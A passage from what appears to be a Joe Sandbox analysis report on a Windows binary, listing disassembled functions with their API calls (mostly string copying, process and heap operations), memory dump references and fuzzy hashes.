                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 366bef53b2674d7f2296f6e33237af3156447d72a3cf3a01f61a4f67a6a74702
                                • Instruction ID: 355217f9062b0ecc01fb2342cbab86e5ca74a5ea7ad5b28a30227253978ac8d1
                                • Opcode Fuzzy Hash: 366bef53b2674d7f2296f6e33237af3156447d72a3cf3a01f61a4f67a6a74702
                                • Instruction Fuzzy Hash: 32319571A101189FCB65EF68DC45BEE73B4FF88310F1584B8BA1AA7241DE70AF449B94
                                Function 00C94480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 00C94492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00C944AD
                                • CloseHandle.KERNEL32(00000000), ref: 00C944B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C944E7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: ed0d4509fcc6285ce229e76cacd11d95de4c6395f6358d155bf95a0092c5caa7
                                • Instruction ID: fedb9b690c1f9d29614326298e199de6e9b764cbd398bdad2a652d131b9540dc
                                • Opcode Fuzzy Hash: ed0d4509fcc6285ce229e76cacd11d95de4c6395f6358d155bf95a0092c5caa7
                                • Instruction Fuzzy Hash: 9FF0FCB19016152FEB209B759C4DFEA7AA8EF15304F044590FA55E7181DBB09D85C790
                                Function 00C98FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00C98FDD
                                  • Part of subcall function 00C987FF: __amsg_exit.LIBCMT ref: 00C9880F
                                • __getptd.LIBCMT ref: 00C98FF4
                                • __amsg_exit.LIBCMT ref: 00C99002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00C99026
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: b57c82b6cd4d8229e83d2c52cdcb0d630ae76086cf8b9f836d4c1c74a1325448
                                • Instruction ID: 200aa5e970c0e913d94bc5e41e1b478082bcc0336250a2c3ee33e8f0132b6e69
                                • Opcode Fuzzy Hash: b57c82b6cd4d8229e83d2c52cdcb0d630ae76086cf8b9f836d4c1c74a1325448
                                • Instruction Fuzzy Hash: B4F0F0329096109BDF20BBBC980F70D33A0AF01724F24520CF020AB1D2CF345A10FA59
                                Function 00C97310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(------,00C75BEB), ref: 00C9731B
                                • lstrcpy.KERNEL32(00000000), ref: 00C9733F
                                • lstrcat.KERNEL32(?,------), ref: 00C97349
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 464290e95db4b2e2788d603a6d9d37134664d0cbe4750ab3d20d0219cfd46906
                                • Instruction ID: c0a153fc48f4189a5eb6090623f2b2914dc1fcdf7e5f9922c143d26938723b75
                                • Opcode Fuzzy Hash: 464290e95db4b2e2788d603a6d9d37134664d0cbe4750ab3d20d0219cfd46906
                                • Instruction Fuzzy Hash: 11F0C0745117029FDB649F36D94CA27B6F9EF4570131C891DA89AC7225E730E840DB10
                                Function 00C833D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C83422
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C83471
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C83497
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: f7ad3fa8a24cc6b79cb8be42e8c96514b6d191b86f2741d6d1213054f3c794be
                                • Instruction ID: 3b195557aac0fd514493cf58f3f7270ff62a82173ad48e4701b170a1714326bb
                                • Opcode Fuzzy Hash: f7ad3fa8a24cc6b79cb8be42e8c96514b6d191b86f2741d6d1213054f3c794be
                                • Instruction Fuzzy Hash: A8121D70A022518FDB18DF19C558B25B7E0BF45B18B1DD0AEE819DB3A2D772EE42CB44
                                Function 00C87C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87CAF
                                  • Part of subcall function 00C87D40: std::_Xinvalid_argument.LIBCPMT ref: 00C87D58
                                  • Part of subcall function 00C87D40: std::_Xinvalid_argument.LIBCPMT ref: 00C87D76
                                  • Part of subcall function 00C87D40: std::_Xinvalid_argument.LIBCPMT ref: 00C87D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 7008bfa80c171bc1335c8ece172b5c7f252bd5766d95912fc8cae333b4f9ba9d
                                • Instruction ID: b141aa1a98ca4a35d88340df8b996982b0291aa2b33acabb69cea9af8367913e
                                • Opcode Fuzzy Hash: 7008bfa80c171bc1335c8ece172b5c7f252bd5766d95912fc8cae333b4f9ba9d
                                • Instruction Fuzzy Hash: C631C4723086108BD724EE6CE88096AF7E9EF91768B30472BF5568B641E771DD4183AC
                                Function 00C76EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00C76F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C76F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 1f61687b016de029f59b683b999e52d06afcbdac3efdf2e709a2fca22d0d1e13
                                • Instruction ID: 8281e6afb2886d4d7da9395d83fa944da7d5a6108c2ac7f0d1d5408f3b4721da
                                • Opcode Fuzzy Hash: 1f61687b016de029f59b683b999e52d06afcbdac3efdf2e709a2fca22d0d1e13
                                • Instruction Fuzzy Hash: 9A21AEB0600B028FEB208B60DC84BB773E8EB45744F448978F95ACB685F7B4EA45C750
                                Function 00C92400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C9244C
                                • lstrlen.KERNEL32(00000000), ref: 00C924E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C92570
                                • lstrlen.KERNEL32(00000000), ref: 00C92577
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 1ea0b9802e7fa519fe761f3f9462e5ec0458cd4e43176a91ed08106baf076b84
                                • Instruction ID: 03c590ab9816c93b4f828e77733539c67cb2b568c46826ea68bd0f33b47f0de1
                                • Opcode Fuzzy Hash: 1ea0b9802e7fa519fe761f3f9462e5ec0458cd4e43176a91ed08106baf076b84
                                • Instruction Fuzzy Hash: FC81E4B1E01205ABDF14DF99DC48BAEB7B5FF94300F188069E548A7381EB359E46CB94
                                Function 00C91570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00C915A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C915D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C91611
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C91649
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: ce0f9d8319792152efedd0d18f9bd3a46ddbc9e7c0f8520e3ca96636c836a414
                                • Instruction ID: d8781ca74bd634338986fa90cd3c699aac572e1e0adce2d680d2e161a77a84f4
                                • Opcode Fuzzy Hash: ce0f9d8319792152efedd0d18f9bd3a46ddbc9e7c0f8520e3ca96636c836a414
                                • Instruction Fuzzy Hash: 3D21F974611B039FDB24DF2AD459A17B7F5EF88710B09891CA8AAC7A41DB30F941CB90
                                Function 00C71530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C71610: lstrcpy.KERNEL32(00000000), ref: 00C7162D
                                  • Part of subcall function 00C71610: lstrcpy.KERNEL32(00000000,?), ref: 00C7164F
                                  • Part of subcall function 00C71610: lstrcpy.KERNEL32(00000000,?), ref: 00C71671
                                  • Part of subcall function 00C71610: lstrcpy.KERNEL32(00000000,?), ref: 00C71693
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 50033c2edb456ae375599c98650433e9edf5b897870d0d95b8d37b4a76192ca9
                                • Instruction ID: 3cdda566f08ffabf9d29124a45fbf2f9312221adeb0a5ea00135a8b768aff1a5
                                • Opcode Fuzzy Hash: 50033c2edb456ae375599c98650433e9edf5b897870d0d95b8d37b4a76192ca9
                                • Instruction Fuzzy Hash: 5431C874A11B029FC768DF3AC588956BBF5FF49305708892DA9AAC3B10DB30F811CB80
                                Function 00C71610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00C7162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71671
